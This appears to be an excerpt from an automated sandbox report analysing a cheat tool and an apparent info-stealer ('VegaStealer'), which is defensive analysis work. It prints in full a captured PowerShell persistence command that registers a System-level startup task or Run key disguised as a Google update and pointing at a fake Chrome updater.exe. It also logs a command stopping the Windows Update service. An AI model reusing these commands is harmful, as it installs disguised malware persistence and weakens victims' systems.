Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	File created: C:\Users\user\AppData\Local\Temp\BouncyCastle.Crypto.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\cfoutowi.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	File created: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	File created: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	File created: C:\Users\user\AppData\Local\Temp\EntityFramework.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SharcHack.exe	File created: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Jump to dropped file

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\Temp\cfoutowi.tmp

Jump to dropped file

Boot Survival

Uses Register-ScheduledTask to add task schedules

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\CFOUTOWI.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\CFOUTOWI.TMP

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\SharcHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
